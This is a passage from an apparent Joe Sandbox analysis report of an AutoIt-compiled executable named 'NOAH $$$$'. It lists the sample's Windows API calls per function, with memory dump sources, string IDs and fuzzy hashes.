                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                        • API String ID: 2907320926-3566645568
                                                                                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                        • DeleteObject.GDI32(00730000), ref: 00470A04
                                                                                                                                        • DestroyIcon.USER32(0041005C), ref: 00470A1C
                                                                                                                                        • DeleteObject.GDI32(6DEDB261), ref: 00470A34
                                                                                                                                        • DestroyWindow.USER32(00730055), ref: 00470A4C
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1237572874-0
                                                                                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3413494760-0
                                                                                                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                        • String ID: AU3_FreeVar
                                                                                                                                        • API String ID: 2634073740-771828931
                                                                                                                                        • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                        • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                        • API String ID: 2294789929-1287834457
                                                                                                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                        • API String ID: 2483343779-2107944366
                                                                                                                                        • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                        • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                        • String ID: -----$SysListView32
                                                                                                                                        • API String ID: 4008455318-3975388722
                                                                                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                        • GetParent.USER32 ref: 00469C98
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                        • GetParent.USER32 ref: 00469CBC
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 2360848162-1403004172
                                                                                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 262282135-0
                                                                                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                        • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
